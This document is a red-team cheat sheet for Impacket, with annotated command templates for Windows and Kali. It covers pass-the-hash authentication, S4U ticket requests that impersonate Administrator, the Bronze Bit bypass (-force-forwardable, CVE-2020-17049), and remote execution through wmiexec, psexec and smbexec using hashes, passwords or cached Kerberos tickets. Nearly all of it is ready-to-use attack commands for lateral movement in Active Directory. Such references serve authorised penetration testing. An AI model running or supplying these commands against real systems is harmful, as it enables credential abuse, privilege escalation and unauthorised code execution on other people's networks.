
Impacket

Usage On Windows

getST

# Use Hashes
# -hashes takes LMHASH:NTHASH; the leading ':' leaves the LM half empty, so <Hash> is the NT hash only.
# -impersonate asks the KDC (via S4U) for a ticket to the SPN as the named user; this assumes <UserName>
# is an account allowed to delegate to that target (constrained delegation / RBCD) -- verify in AD first.
# The host part of the SPN must match the <Machine Name> passed later to psexec/smbexec/wmiexec -k:
# the ticket is bound to that name, not to an IP address.
# getST writes the ticket to a .ccache in the current directory; point KRB5CCNAME at it
# (`set KRB5CCNAME=<file>.ccache` on Windows) before running the -k -no-pass commands below.
getST -hashes :<Hash> -spn "cifs/<Machine Name>" -impersonate "Administrator" <Domain>/<UserName>
# -force-forwardable overrides a non-forwardable S4U2self ticket; it only helps against DCs not yet
# patched for the "Bronze Bit" issue (CVE-2020-17049). -dc-ip pins the DC when there is no DNS.
getST -hashes :<Hash> -spn "cifs/<Machine Name>" -impersonate "Administrator" <Domain>/<UserName> -force-forwardable -dc-ip <IP>

# Use UserName:Password
# Putting :<Password> on the command line leaves it in shell history and process listings;
# omit it and Impacket prompts for the password interactively instead.
getST -spn "cifs/<Machine Name>" -impersonate "Administrator" <Domain>/<UserName>:<Password>
getST -spn "cifs/<Machine Name>" -impersonate "Administrator" <Domain>/<UserName>:<Password> -force-forwardable -dc-ip <IP>

Exec

# Without DNS
# <Machine Name> is the name the target is authenticated against (SPN / NTLM target name);
# -target-ip supplies the address so no DNS lookup is needed. Keep the real hostname here --
# Kerberos (-k, below) will not work with an IP in its place.
# -codec selects the decoder for command output; gbk matches a zh-CN target console. Use the
# target's own codepage otherwise (e.g. cp437 or utf-8 on en-US), or the output comes back garbled.
# NOTE(review): psexec uploads a service binary to an admin share and installs a service, smbexec
# installs a service per command, wmiexec executes through WMI/DCOM with no dropped binary --
# each leaves different host artifacts; check against the engagement's detection baseline.
# Use Hashes
# <Hash> is the NT hash; the LM half before ':' is left empty.
wmiexec -hashes :<Hash> <Domain>/<UserName>@<Machine Name> -codec gbk -target-ip <IP> <command>
psexec -hashes :<Hash> <Domain>/<UserName>@<Machine Name> -codec gbk -target-ip <IP> <command>
# smbexec takes no <command>: it opens an interactive semi-shell and runs each line you type.
smbexec -hashes :<Hash> <Domain>/<UserName>@<Machine Name> -codec gbk -target-ip <IP>

# Use UserName:Password
# Passing :<Password> inline exposes it in shell history and process listings; leave it off to be
# prompted. If the password contains shell metacharacters, quote the whole target string.
wmiexec <Domain>/<UserName>:<Password>@<Machine Name> -codec gbk -target-ip <IP> <command>
psexec <Domain>/<UserName>:<Password>@<Machine Name> -codec gbk -target-ip <IP> <command>
smbexec <Domain>/<UserName>:<Password>@<Machine Name> -codec gbk -target-ip <IP>

# Kerberos with a cached ticket: -k reads the ccache named by KRB5CCNAME (e.g. the one getST wrote
# above), -no-pass skips the password prompt. Add -debug to any of these for verbose output when
# a step fails (common causes: KRB5CCNAME unset, SPN host != <Machine Name>, clock skew).
wmiexec -k -no-pass <Domain>/<UserName>@<Machine Name> -codec gbk -target-ip <IP> <command>
psexec -k -no-pass <Domain>/<UserName>@<Machine Name> -codec gbk -target-ip <IP> <command>
smbexec -k -no-pass <Domain>/<UserName>@<Machine Name> -codec gbk -target-ip <IP>

Usage On Kali

Exec

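# Without DNS
# Kali's impacket package installs the scripts as lowercase impacket-<tool> in /usr/bin; Linux paths
# are case-sensitive, so "Impacket-wmiexec" fails with "command not found". Use the lowercase names.
# <Machine Name> stays the real hostname; -target-ip supplies the address so no DNS is needed.
# -codec gbk decodes output from a zh-CN target console; use the target's codepage otherwise.
# Quoting the target string keeps the shell from interpreting the '@'/':' separators or any
# metacharacters in <Password>.
# Use Hashes
# <NTLM_HASH> is the NT hash; the LM half before ':' is left empty.
impacket-wmiexec -hashes :<NTLM_HASH> '<Domain>/<UserName>@<Machine Name>' -codec gbk -target-ip <IP> <command>
impacket-psexec -hashes :<NTLM_HASH> '<Domain>/<UserName>@<Machine Name>' -codec gbk -target-ip <IP> <command>
# smbexec takes no <command>: it opens an interactive semi-shell.
impacket-smbexec -hashes :<NTLM_HASH> '<Domain>/<UserName>@<Machine Name>' -codec gbk -target-ip <IP>

# Use UserName:Password
# Passing :<Password> inline exposes it in shell history and process listings; leave it off to be prompted.
impacket-wmiexec '<Domain>/<UserName>:<Password>@<Machine Name>' -codec gbk -target-ip <IP> <command>
impacket-psexec '<Domain>/<UserName>:<Password>@<Machine Name>' -codec gbk -target-ip <IP> <command>
impacket-smbexec '<Domain>/<UserName>:<Password>@<Machine Name>' -codec gbk -target-ip <IP>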